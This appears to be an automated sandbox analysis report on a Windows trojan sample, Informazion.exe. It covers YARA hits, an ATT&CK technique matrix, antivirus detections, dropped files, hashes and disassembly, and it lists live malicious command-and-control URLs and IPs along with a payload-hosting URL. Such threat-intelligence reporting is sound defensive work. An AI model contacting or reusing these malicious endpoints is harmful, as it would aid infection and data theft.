Source: Yara match | File source: 1.2.maintainabovl.exe.c0e0000.9.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.3d82f90.5.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.3d82f90.5.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.c0e0000.9.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.3d22f50.8.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.3d42f70.7.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: Process Memory Space: maintainabovl.exe PID: 5732 | type: MEMORYSTR
Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
MITRE ATT&CK Matrix

The matrix is listed per tactic; a bracketed number in front of a technique is the report's signature-count badge for that technique, and techniques without a number are unflagged template entries.

Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise
Execution: [2] Windows Management Instrumentation | [12] Native API | [1] PowerShell | At (Windows) | Cron | Launchd | Scheduled Task | Command and Scripting Interpreter | PowerShell | AppleScript
Persistence: [1] Registry Run Keys / Startup Folder | Boot or Logon Initialization Scripts | Logon Script (Windows) | Logon Script (Mac) | Network Logon Script | Rc.common | Startup Items | Scheduled Task/Job | At (Linux) | At (Windows)
Privilege Escalation: [1] Access Token Manipulation | [111] Process Injection | [1] Registry Run Keys / Startup Folder | Logon Script (Mac) | Network Logon Script | Rc.common | Startup Items | Scheduled Task/Job | At (Linux) | At (Windows)
Defense Evasion: [1] Disable or Modify Tools | [1] Deobfuscate/Decode Files or Information | [1] Obfuscated Files or Information | [11] Software Packing | [1] Timestomp | [1] Masquerading | [121] Virtualization/Sandbox Evasion | [1] Access Token Manipulation | [111] Process Injection | [1] Rundll32
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing
Discovery: [1] System Time Discovery | [1] Account Discovery | [2] File and Directory Discovery | [136] System Information Discovery | [11] Security Software Discovery | [121] Virtualization/Sandbox Evasion | [2] Process Discovery | [1] Application Window Discovery | [1] System Owner/User Discovery | [1] Remote System Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Shared Webroot | Software Deployment Tools | Taint Shared Content
Collection: [11] Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Command and Control: [1] Ingress Tool Transfer | [21] Encrypted Channel | [2] Non-Application Layer Protocol | [13] Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols
Network Effects: Eavesdrop on Insecure Network Communication | Exploit SS7 to Redirect Phone Calls/SMS | Exploit SS7 to Track Device Location | SIM Card Swap | Manipulate Device Communication | Jamming or Denial of Service | Rogue Wi-Fi Access Points | Downgrade to Insecure Protocols | Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization | Remotely Wipe Data Without Authorization | Obtain Device Cloud Backups
Impact: [1] Data Encrypted for Impact | [1] System Shutdown/Reboot | Delete Device Data | Carrier Billing Fraud | Manipulate App Store Rankings or Ratings | Abuse Accessibility Features | Data Encrypted for Impact | Generate Fraudulent Advertising Revenue | Data Destruction | Data Encrypted for Impact

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label | Link
Informazion.exe | 15% | Virustotal | | Browse

Dropped Files
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | 100% | Avira | TR/Crypt.OPACK.Gen |

Unpacked PE Files
Source | Detection | Scanner | Label | Link | Download
1.2.maintainabovl.exe.2deb5a8.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
1.2.maintainabovl.exe.2e0cee0.3.unpack | 100% | Avira | TR/Patched.Ren.Gen4 | | Download File
7.2.maintainabovl.exe.1090000.1.unpack | 100% | Avira | HEUR/AGEN.1245293 | | Download File
1.2.maintainabovl.exe.2d6f3f8.4.unpack | 100% | Avira | TR/Patched.Ren.Gen4 | | Download File
7.2.maintainabovl.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7 | | Download File
1.2.maintainabovl.exe.2e03a34.0.unpack | 100% | Avira | TR/Patched.Ren.Gen4 | | Download File

Domains
No Antivirus matches
URLs
Source | Detection | Scanner | Label | Link
http://www.sajatypeworks.comiv | 0% | URL Reputation | safe |
http://www.sajatypeworks.com2 | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://193.0.178.157/drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk | 0% | Avira URL Cloud | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/6 | 0% | URL Reputation | safe |
http://62.173.149.202/drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cnr | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/$ | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/ | 0% | URL Reputation | safe |
http://www.fontbureau.comF | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/U | 0% | URL Reputation | safe |
http://www.sajatypeworks.comt | 0% | URL Reputation | safe |
http://en.wikipedia | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe |
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.fontbureau.comueTFg | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/Y0/L | 0% | Avira URL Cloud | safe |
http://www.sajatypeworks.com3 | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/q | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn3 | 0% | URL Reputation | safe |
http://www.fontbureau.comm | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/jp/- | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/g | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/h | 0% | URL Reputation | safe |
http://www.fontbureau.comM.TTF | 0% | URL Reputation | safe |
http://www.fontbureau.comsivaz | 0% | Avira URL Cloud | safe |
http://193.0. | 0% | Avira URL Cloud | safe |
https://christianbeltran.co/wp-admin/images/css/ground/bo/Zujiies.png | 0% | Avira URL Cloud | safe |
http://www.fontbureau.comrsivL | 0% | Avira URL Cloud | safe |
https://christianbeltran.co | 0% | Avira URL Cloud | safe |
http://en.w. | 0% | Avira URL Cloud | safe |
http://www.fontbureau.coma6 | 0% | Avira URL Cloud | safe |
http://www.fontbureau.comkh | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cnved3 | 0% | Avira URL Cloud | safe |
Name / IP / Active / Malicious / Antivirus Detection / Reputation
christianbeltran.co
• IP: 174.142.60.54
• Active: true
• Malicious: false
• Reputation: unknown
checklist.skype.com
• IP: unknown
• Active: unknown
• Malicious: false
• Reputation: high
Name / Malicious / Antivirus Detection / Reputation
http://193.0.178.157/drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk
• Malicious: true
• Avira URL Cloud: safe
• Reputation: unknown
http://62.173.149.202/drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk
• Malicious: true
• Avira URL Cloud: safe
• Reputation: unknown
https://christianbeltran.co/wp-admin/images/css/ground/bo/Zujiies.png
• Malicious: false
• Avira URL Cloud: safe
• Reputation: unknown
IP / Domain / Country / Flag / ASN / ASN Name / Malicious
193.0.178.157
• Domain: unknown
• Country: Russian Federation
• ASN: 202423
• ASN Name: MGNHOST-AS RU
• Malicious: true
174.142.60.54
• Domain: christianbeltran.co
• Country: Canada
• ASN: 32613
• ASN Name: IWEB-AS CA
• Malicious: false
62.173.149.202
• Domain: unknown
• Country: Russian Federation
• ASN: 34300
• ASN Name: SPACENET-AS Internet Service Provider RU
• Malicious: true
31.41.44.158
• Domain: unknown
• Country: Russian Federation
• ASN: 56577
• ASN Name: ASRELINK RU
• Malicious: true
IP
192.168.2.1
                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                  Analysis ID:782969
                                                  Start date and time:2023-01-12 12:10:13 +01:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 14m 20s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:Informazion.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@9/6@2/5
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 80.9% (good quality ratio 73.6%)
                                                  • Quality average: 75.2%
                                                  • Quality standard deviation: 32.9%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 90
                                                  • Number of non-executed functions: 61
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240s for rundll32
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
12:11:51  API Interceptor  38x Sleep call for process: powershell.exe modified
12:12:36  API Interceptor  1x Sleep call for process: maintainabovl.exe modified
                                                  Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1537
                                                  Entropy (8bit):5.3478589519339295
                                                  Encrypted:false
                                                  SSDEEP:48:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzvFHLHKdHKBqHKs:Pq5qXEwCYqhQnoPtIxHeqzNrqdq4qs
                                                  MD5:F6D3657BD1FBEF54E7F7BACB2497E327
                                                  SHA1:A0A712015C242DCC28B69CDF567F594627C9CFA0
                                                  SHA-256:5B16B4A3E65F04484B12171163A2A739409FA7F8C3D69BF9BAD961618D973301
                                                  SHA-512:0231195A111259A3AA48526DCBEA98394099794C710C3FB8E0E12E2B4D30C60FB4064F7F4F671866FB0D94585E23B73C1270440242B25DA60CCFFA82B0B74306
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5829
                                                  Entropy (8bit):4.902247628650607
                                                  Encrypted:false
                                                  SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                                  MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                                  SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                                  SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                                  SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16488
                                                  Entropy (8bit):5.546874985445841
                                                  Encrypted:false
                                                  SSDEEP:384:Pte/c0y/YV6Bl2lzN8MSBxAjyRiJ9gySJ3uzp1iZYv:bn32RNl4xAu1ycuzxv
                                                  MD5:419626D0F61F36D9C94048612CECDDD9
                                                  SHA1:51412557F0CB543375F9B6B39EF79185FD3D0C54
                                                  SHA-256:8AE6B7AA70C27DAAF64A42CE2331121C8BA03C212921D83528E024F73250CBE3
                                                  SHA-512:8C6678ADEF2F7546CB888BE7EC2AEEE395963BE01B9160A60CA38B00129B22EE7CD2F260B9DFAED713538A0C8DC2205924F56DEE51C46C2F210BC1DC066E25A2
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:@...e...................t...n.c.....q.....I..........@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                  Process:C:\Users\user\Desktop\Informazion.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):380008704
                                                  Entropy (8bit):3.400186163202593E-4
                                                  Encrypted:false
                                                  SSDEEP:192:4w2ChcpVaLF/I0mfXXLuWhLsc9Y7ee9aD:4XChcpwLF/ITfXXLuELTrca
                                                  MD5:B405B1565194722F9457002C4EDACBAE
                                                  SHA1:3A3B6F5A05D8D2E95432ABEA5241F9FC5178A6FA
                                                  SHA-256:C37FC8E08A4DEDAC07C4A058B243A6BBAB08239FD52B36DBE5DE9FB114DECC59
                                                  SHA-512:BF7963AB33052EF586B9F3D0B201F34D7DDCE4B3D06F697F505B55A6CD2661E92EDC76A34113D83C3C61DB7EF12856BF5859353D6DD2F6864D8826934E0A1720
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..............6... ...@....@.. ....................................`..................................6..O....@..t....................`......t6............................................... ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`....... ..............@..B.................6......H........#...............5..............................................Z(.....(....s....(....*..(....*..0..V........s....(......o......o....o......s...... .M..o.........,..o......,..o......,..o.......*...(....&..5.......... ?..........6I.......0..z.........+l.r...p(.....(....r...po.....s .......+.......i].....a.o!......X......i2..o"......!&#......$@(#...($.......X....2..*..*..........QV........(....*~.(%....(............s&...('...*..s(...}.....(.....(.....(.....(....*....0..
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Entropy (8bit):4.0036398439821355
                                                  TrID:
                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                  • DOS Executable Generic (2002/1) 0.92%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:Informazion.exe
                                                  File size:774656
                                                  MD5:ef4c4f0b7a8cd7b8bd2d2dc6e5982043
                                                  SHA1:2374d2dc1ca7f5ebed5386114562ee677eacdb42
                                                  SHA256:6da6fa5a959ad50302b32db9fad3862abcbd0597402941d66935203300d52821
                                                  SHA512:a9a45702a6d1018b0e685db5f827cd52a6b29e0f20313977c062929af5fb092cda906dc76b7f74fe24cd332921c4a50106bb263ec6f3b932799f2e8171b4fd4c
                                                  SSDEEP:3072:oahKyd2n31U5OgWjtGqOh9j2o8zoSg0wK3BG+6s78cv+wUUBrvjCZPkM04Z9OZwi:oahO5LEJIS0wC/f8m+s/M0O9kxU
                                                  TLSH:23F404C53344D553EC1B4A304E53C79A9769FCA1FA60309B33B4F76E4A3AAC22E29715
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                                                  Icon Hash:b6baaebcbabbf82c
                                                  Entrypoint:0x140008200
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:10
                                                  OS Version Minor:0
                                                  File Version Major:10
                                                  File Version Minor:0
                                                  Subsystem Version Major:10
                                                  Subsystem Version Minor:0
                                                  Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
Instruction
  dec eax
  sub esp, 28h
  call 00007F218D27B010h
  dec eax
  add esp, 28h
  jmp 00007F218D27A8BBh
  int3
  int3
  int3
  int3
  int3
  int3
  dec eax
  mov dword ptr [esp+08h], ebx
  dec eax
  mov dword ptr [esp+10h], edi
  inc ecx
  push esi
  dec eax
  sub esp, 000000B0h
  and dword ptr [esp+20h], 00000000h
  dec eax
  lea ecx, dword ptr [esp+40h]
  call dword ptr [000011CDh]
  nop
  dec eax
  mov eax, dword ptr [00000030h]
  dec eax
  mov ebx, dword ptr [eax+08h]
  xor edi, edi
  xor eax, eax
  dec eax
  cmpxchg dword ptr [00004922h], ebx
  je 00007F218D27A8BCh
  dec eax
  cmp eax, ebx
  jne 00007F218D27A8CCh
  mov edi, 00000001h
  mov eax, dword ptr [00004918h]
  cmp eax, 01h
  jne 00007F218D27A8C9h
  lea ecx, dword ptr [eax+1Eh]
  call 00007F218D27AEA3h
  jmp 00007F218D27A92Ch
  mov ecx, 000003E8h
  call dword ptr [0000117Eh]
  jmp 00007F218D27A879h
  mov eax, dword ptr [000048F6h]
  test eax, eax
  jne 00007F218D27A90Bh
  mov dword ptr [000048E8h], 00000001h
  dec esp
  lea esi, dword ptr [000013E9h]
  dec eax
  lea ebx, dword ptr [000013CAh]
  dec eax
  mov dword ptr [esp+30h], ebx
  mov dword ptr [esp+24h], eax
  dec ecx
  cmp ebx, esi
  jnc 00007F218D27A8D7h
  test eax, eax
  jne 00007F218D27A8D7h
  dec eax
  cmp dword ptr [ebx], 00000000h
  je 00007F218D27A8C2h
  dec eax
  mov eax, dword ptr [ebx]
  dec eax
  mov ecx, dword ptr [00001388h]
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0xb2090 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2000 | 0x20 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
